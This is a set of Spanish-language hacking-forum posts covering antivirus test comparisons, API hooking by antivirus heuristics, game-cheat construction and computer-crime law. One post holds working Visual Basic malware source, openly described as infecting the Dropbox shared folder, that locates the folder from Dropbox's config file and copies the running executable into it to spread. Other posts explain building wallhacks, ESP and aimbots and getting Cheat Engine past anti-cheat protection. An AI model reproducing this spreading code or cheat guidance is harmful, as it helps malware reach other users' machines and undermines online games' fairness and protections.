Mensajes

Ya se ha dicho varias veces en el foro, pero lo podemos repetir una vez más

Hablar de "mejor antivirus" es muy general, esa pregunta no tiene una respuesta correcta... lo mejor es separar los antivirus por "áreas" y analizarlos desde ahí, ejemplo:

Mejor antivirus mirando tasas de detección
Mejor antivirus mirando rendimiento y velocidad
Mejor antivirus mirando motor de heuristica para muestras desconocidas
Mejor antivirus mirando áreas d eprotección (mail, cloudscanning, firewall, etc....)
...

En cada sección podrás situar a cada antivirus y luego hacer una media según lo que TU consideres más importante... por ejemplo hay gente que le importa más el rendimiento que el % de detección y viceversa.

Así es como realmente podrás hacer un estudio "real" y equitativo. Para ello la gente de AV-COMPARATIVES lleva años haciendo ese trabajo mes a mes, midiendo y puntuando todos los AV's del mercado bajo las premisas que he puesto antes, ejemplo:



Aquí están todos los test por separado, en cada uno aparece un ganador y luego hacen la media. Os dejo el report del último mes:

Test de mejor AV detectando malware: http://www.av-comparatives.org/wp-content/uploads/2014/10/avc_fdt_201409_en.pdf



Test de mejor antivirus con mejor "perfomance": http://www.av-comparatives.org/wp-content/uploads/2014/11/avc_per_201410_en.pdf



Test del mejor AV con mejor heuristica/proactiva: http://www.av-comparatives.org/wp-content/uploads/2014/07/avc_beh_201403_en.pdf



Test del mejor AV eliminando malware ya infectado: http://www.av-comparatives.org/wp-content/uploads/2014/12/avc_rem_201411_en.pdf



------------------------------------------------------

Con esos datos presentes... ¿cual antivirus es mejor? Pues depende... si te interesa un AV ligero el mejor es ESET NOD32. SI buscas un AV que detecte lo máximo posible: AVIRA. ¿El mejor antivirus con la mejor Heuristica/proactiva? Bitdefender

Ala, aquí tienes la respuesta

[kl1.sys]

Exacto, por eso puse "hooks" entre comillas. Si no recuerdo mal, KAV instala un pequeño driver que hace de "filtro" a esas llamadas y detecta comportamiento "vírico" en su heuristica. kl1.sys creo que se llamaba

Algunas proactivas de los AV monitorizan las llamadas a las API's, así detectan comportamientos sospechosos.

Por ejemplo, si un ejecutable, hace una llamada a RegOpenKeyEx (para leer el registro), la proactiva del AV puede "hookear" esa llamada, leer los parametros y comprobar si se está accediendo a HKLM\Software\Microsoft\Windows\CurrentVersion\Run y detectar así un intento de autorun. Lo mismo para APIS de borrar ficheros, copiar, etc...

Saludos

[BASICAS]

Hola Blipi. Soy nuevo en esto, pero quiero aprender. Te digo, mi objetivo es aprender a crear wall hack y/o marcar enemigos para juegos de disparos en 1ra persona en juegos online que son de servidores como los de facebook y otras paginas. Use hacks ya creados que los descargaba desde distintas paginas y creo que eran hechos con cheat engine de marcar enemigos, pero o duran muy poco tiempo o te banean la cuenta. Puedes enseñarme? Gracias

Hola, eso que quieres hacer no es tan facil. Te doy las indicaciones BASICAS y ya decides tú mismo si te interesa seguir aprendiendo o no:

Wallhack: Tienes que conocer que render utiliza el juego (normalmente suele ser DirectX o OpenGL). Tendrás que inyectar en el proceso y hookear la librería DirectX o OpenGL, a partir de ahí usando las funciones propias del render podrás listar las estructuras generadas (los objetos del juego), disecciona dichas estructuras y quédate con lo que sean paredes (por ejemplo), llama a la función wireframe del render para convertirla en líneas, cambia el alphabending o el zorder, ejemplos:

WIREFRAME:



ALPHABENDING:



ZORDER:



Sobre lo que comentas para marcar enemigos.... eso se llama ESP HACK y es bastante más complejo que el wallhack. Me explico:

Necesitas injectar código en la función del juego que controla el movimiento de los objetos o localizar el pointer correcto que almacena las coordenadas X Y Z de cada objeto del juego. Una vez tengas eso necesitarás programar MUY BIEN y saber matemáticas:

Conociendo la posición X Y Z de tu personaje y la posición X Y Z de los enemigos, tendrás que aplicar formulas matemáticas de triangulación para conocer el punto exacto de la pantalla donde se posiciona un enemigo:

LEE AQUI: http://es.wikipedia.org/wiki/Triangulaci%C3%B3n

Cuando lo tengas controlado, deberás hookear el render de OpenGL o DirectX para dibujar un recuadro justo encima de esa posición, el tamaño dependerá del factor Z que indica lo lejos que está el enemigo:



Si encima quieres un aimbot, hookea el mouse y haz que el puntero de tu personaje se situe en cada enemigo a partir de su posición triangulada PEEEEERO deberás listar todos los objetos del juego para saber si hay una pared o no entre tu personaje y el enemigo, evitando así que gastes munición inútilmente.

Luego hay otros tipos de hacks como el lambert, norecoil, no spread, fullbright, quickswap, teleporthack, etc... si tienes dudas me preguntas.

Y ya está, como ves es muy complejo. Se necesitan conocimientos ELEVADOS de programación, hooks y matemáticas, muchisimo tiempo y ganas de aprender.

Saludos

[iddqd]

Hola, vayamos por partes... ya que no me queda nada clara tus dudas:

EL juego es online? Olvidate de utilizar CE, si el juego está correctamente programado no podrás modificar nada en local.

Los codigos que pones... que son? de donde los has sacado? Parecen cheatcodes internos del juego, es posible? Como cheatcode me refiero al iddqd del doom por ejemplo.

@Orb, algunos juegos online almacenan variables locales que pueden ser modificadas, la mayoría de timers, contadores y coordenadas se suelen gestionar en local. Por ello se pueden ver speedhackers en juegos online la mayoría de veces. En juegos FPS (first person shooters), los cálculos del spread de las balas se suele hacer en local (ya que el server no aguantaría la demanda de responder cuantos grados se ha de desviar las balas de TODAS las ametralladoras de una misma partida). COsas así se pueden hackear aún siendo online.

Por lo ultimo que comentas del crash.. es posible que ese juego online tenga protección anticheats, prueba de configurar el CE en modo VEH debugger, pero no suele ser tan fácil... Si tu procesador lo soporta, carga la maquina virtual DBVM y mete el debugger por driver.

Saludos

El código no está mal, pero no está correctamente implementado. Utilizas rutas estáticas... que ocurre si ejecutas tu código en un PC cuya carpeta de dropbox esté en "E:\ejemplo\mi_dropbox" ? Para ello utiliza lo siguiente:

Código (vb) [Seleccionar] Expandir

'---------------------------------------------------------------------------------------
' Modulo     :  SpreadDropbox
' Autor      :  uddtools.com
' Adapatdo: MadAntrax
' Fecha      :  16/09/2013
' Finalidad  :  Infectar la carpeta compartida Dropbox
' Uso        :  Call DropboxSpread(App.Path & "\" & App.EXEName & ".exe", "dropbox_spread.exe")
'               Idea extraída del foro uddtools.com, se ha modificado el código quitado dependencias
'               a Microsoft Scripting Runtime
'---------------------------------------------------------------------------------------

Private Sub Form_Load()
   MsgBox "Dropbox Folder = " & getDropboxPath
   Call DropboxSpread(App.Path & "\" & App.EXEName & ".exe", "dropbox_spread.exe")
End Sub

Public Sub DropboxSpread(sFilePath As String, sFileName As String)
   FileCopy sFilePath, getDropboxPath & "\" & sFileName
End Sub

Private Function getDropboxPath() As String
   getDropboxPath = Base64Decode(Read_host(Environ("APPDATA") & "\Dropbox\host.db"))
End Function

Private Function Read_host(sFile As String) As String
   Dim Code As String
   Open sFile For Binary Access Read As #1
       Code = Space(LOF(1))
       Get #1, , Code
   Close #1
   Read_host = Split(Code, Chr(10))(1)
End Function

'Credits to pscode.com
Function Base64Decode(ByVal base64String As String) As String
 Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
 Dim dataLength, sOut, groupBegin
 
 base64String = Replace(base64String, vbCrLf, "")
 base64String = Replace(base64String, vbTab, "")
 base64String = Replace(base64String, " ", "")
 
 dataLength = Len(base64String)
 If dataLength Mod 4 <> 0 Then Exit Function
 
 For groupBegin = 1 To dataLength Step 4
   Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
   numDataBytes = 3
   nGroup = 0
   For CharCounter = 0 To 3
     thisChar = Mid(base64String, groupBegin + CharCounter, 1)
     If thisChar = "=" Then
       numDataBytes = numDataBytes - 1
       thisData = 0
     Else
       thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
     End If
     If thisData = -1 Then Exit Function
     nGroup = 64 * nGroup + thisData
   Next
   nGroup = Hex(nGroup)
   nGroup = String(6 - Len(nGroup), "0") & nGroup
   pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + Chr(CByte("&H" & Mid(nGroup, 3, 2))) + Chr(CByte("&H" & Mid(nGroup, 5, 2)))
   sOut = sOut & Left(pOut, numDataBytes)
 Next
 Base64Decode = sOut
End Function


siento que la gente solo lee mi primer parrafo siempre XD

en general el problema es que ping es muy lento, es tcp, espera respuesta del servidor, etc... tiene una serie de problemas relacionados para ese fin

Los paquetes ping son ICMP, tan facil como bloquear el trafico ICMP en tu iptables y quedaría negado ese "ataque". No se puede "denegar" una máquina con paquetes ICMP ping, nunca. Ni aunque estemos en 1998 y el servidor atacado sea un Pentium pro de 100MB de ram.

Bueno, éste tema ya se ha desviado lo suficiente como para que tenga que venir MadAntrax a cerrarlo...

El usuario se ha conectado por TOR y ha usado el mail falso para registrarse, su forma de escribir coincide con la de RMax...

No me voy a precipitar, no es mi trabajo hacer de Sherlock Holmes, pero reconozco que me ha temblado el dedo sobre el botón de banear.

Suena interesante. Exactamente como funciona el programa para detectar el malware? Es detección bajo demanda o tiene runtimeScan? Los diferentes engines que son? motores de otros AV's a los que llamas para analizar ficheros?

Saludos!

Hola buenas, soy nuevo en esto y querría saber que podría pasar si hackeara una página web normalita solo por diversion (sin modificar,ni alterar, ni robar datos) solamente por el mero hecho de llevarme la satisfacción de haber logrado superar la seguridad de una página.
La verdad que pregunto esto porque me preocupa bastante el tema del castigo penal en españa y sé que entrar en cualquier página o sitio sin permiso es un delito, lo que no entiendo es porque se tiene que penalizar a alguien que simplemente quiere desarrollar sus capacidades informáticas, sin ninguna mala intención y sin hacer daño a nadie.

Un saludo, gracias.

querría saber que podría pasar si hackeara una página web normalita solo por diversion

Posiblemente termines en la cárcel.

sé que entrar en cualquier página o sitio sin permiso es un delito

Correcto, es un delito. No lo hagas

no entiendo es porque se tiene que penalizar a alguien que simplemente quiere desarrollar sus capacidades informáticas

Digamos que a mi me interesa desarrollar mis artes de robar coches, pero no por ello me van a dejar robar coches, aunque ello vaya a desarrollar mis capacidades...

Ahora que te he contestado, medita un poco y no vuelvas a postear nada semejante a ésto.

Buenos días